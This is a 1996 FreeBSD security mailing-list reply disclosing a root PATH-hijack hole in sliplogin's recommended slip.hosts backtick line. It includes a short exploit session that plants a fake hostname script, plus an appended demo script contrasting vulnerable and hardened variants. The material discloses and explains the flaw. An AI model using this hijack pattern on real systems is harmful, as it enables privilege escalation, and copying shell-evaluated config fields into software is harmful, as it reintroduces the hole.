Date: Mon, 12 Feb 1996 02:36:18 -0800
From: Michael Constant <mconst@ocf.Berkeley.EDU>
To: mconst@csua.berkeley.edu, nate@sri.MT.net
Cc: freebsd-security@freebsd.org
Subject: Re: sliplogin hole?
Message-ID: <199602121036.CAA23693@maelstrom.Berkeley.EDU>
> > The sliplogin(8) manpage recommends using lines of the following form
> > in /etc/sliphome/slip.hosts:
> >
> >     Sfoo `hostname` foo netmask
> >
> > The problem with this is that the `hostname` portion is passed directly
> > to the shell, without any processing -- as root.  This means J. Random
> > Slip-User can create a script called ~/bin/hostname that does whatever
> > he wants, and (as long as ~/bin is before /bin in his path) his script
> > will be run as root the next time he types "sliplogin foo".
>
> Except that the path supplied to sliplogin is the standard unix
> path (PATH=:/bin:/usr/bin), which doesn't use anything from the user's
> home directory (unless it was explicitly set in the shell script).

Well, "PATH=:/bin:/usr/bin" contains the current directory ( . ), which
is just as insecure as not changing the path at all :-)  But thanks for
pointing out my misconception.  The exploit as I stated it does work;
it's written out in full below, in case I didn't explain it clearly in
my original letter.

> Also, if you are concerned about security, you don't allow your
> slip-login users to create/modify any of their slip files, which is easy
> to do as long as you don't give them the same uid's for both shell login
> and slip login accounts and use paranoid permissions on both accounts.

This will work, as long as the shell user is not allowed to run
sliplogin.  Otherwise, the exploit stands:

    jrl@host% cd ~/bin
    jrl@host% cat > hostname
    #! /bin/sh
    touch /etc/i-am-root
    /bin/hostname
    ^D
    jrl@host% chmod 755 hostname
    jrl@host% sliplogin
    Sjrl
    starting slip login for Sjrl ...

and by this point, the deed is done.

- Michael Constant
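The exploit in the mail above does not depend on anything in the user's own environment: the empty leading component of PATH=:/bin:/usr/bin makes the shell search the current directory first, so whoever can choose the working directory of the root shell that expands `hostname` chooses which hostname runs. The script below is an added example, not code from Michael Constant's mail and not sliplogin's own code. It reproduces that mechanism as an unprivileged user in a scratch directory: sliplogin's evaluation of the slip.hosts line is modelled as `/bin/sh -c`, the real /bin/hostname is modelled by a stand-in script in a "trusted" directory, and /etc/i-am-root is modelled by a marker file in the scratch directory (all three are assumptions of the example, not details from the page). The third function goes one step beyond the mail and shows what happens when the config field is treated as data rather than handed to a shell at all.

```shell
#!/bin/sh
# Added example: reproduce the PATH-hijack mechanism from the mail as an
# unprivileged user. Modelling assumptions (not from the original mail):
#   - sliplogin's expansion of the slip.hosts line  ->  /bin/sh -c "..."
#   - the real /bin/hostname                         ->  $TRUSTED_BIN/hostname
#   - /etc/i-am-root                                 ->  $MARKER

DEMO=$(mktemp -d)
TRUSTED_BIN="$DEMO/trusted-bin"   # stands in for /bin:/usr/bin
ATTACKER_DIR="$DEMO/attacker"     # stands in for ~jrl/bin
MARKER="$DEMO/i-am-root"          # stands in for /etc/i-am-root
mkdir -p "$TRUSTED_BIN" "$ATTACKER_DIR"

# The legitimate hostname command the admin expects `hostname` to reach.
printf '#!/bin/sh\necho trusted.example\n' > "$TRUSTED_BIN/hostname"
chmod 755 "$TRUSTED_BIN/hostname"

# The attacker's ~/bin/hostname from the mail: do the privileged action
# (here: write the marker with a redirection, no external command needed),
# then run the real hostname so the output looks normal.
cat > "$ATTACKER_DIR/hostname" <<EOF
#!/bin/sh
: > "$MARKER"
exec "$TRUSTED_BIN/hostname" "\$@"
EOF
chmod 755 "$ATTACKER_DIR/hostname"

# The slip.hosts line recommended by the manpage, with the backtick intact.
SLIP_LINE='Sjrl `hostname` jrl netmask'

# Vulnerable model: the line reaches a shell whose PATH starts with an
# empty component (PATH=:/bin:/usr/bin), so cwd is searched first, and the
# attacker has cd'd into ~/bin before invoking sliplogin.
expand_with_cwd_in_path() {
    (cd "$ATTACKER_DIR" && PATH=":$TRUSTED_BIN" /bin/sh -c "echo $SLIP_LINE")
}

# Hardened model: identical shell expansion, but PATH holds only absolute,
# root-owned directories, so the working directory no longer matters.
expand_with_fixed_path() {
    (cd "$ATTACKER_DIR" && PATH="$TRUSTED_BIN" /bin/sh -c "echo $SLIP_LINE")
}

# Safer still: the config field is data, never shell input. The backticks
# are passed through literally and nothing is executed.
expand_never() {
    (cd "$ATTACKER_DIR" && printf '%s\n' "$SLIP_LINE")
}

marker_present() { [ -e "$MARKER" ]; }
rm_marker() { rm -f "$MARKER"; }

# Stand-alone demo: run all three variants and report whether the marker
# (the "I ran as root" side effect) appeared.
for f in expand_with_cwd_in_path expand_with_fixed_path expand_never; do
    rm_marker
    printf '%-26s -> %s' "$f" "$($f)"
    if marker_present; then echo '   [marker written: hijacked]'
    else echo '   [no marker]'; fi
done
```

Note that the vulnerable and the fixed-PATH variants print the same expanded line; the only visible difference is the marker, which is exactly why a wrapper that calls the real command afterwards goes unnoticed. The fixed-PATH variant removes the hazard discussed in the mail; the literal variant removes the class of bug, since a config file that is never fed to a shell cannot smuggle command substitution in at all.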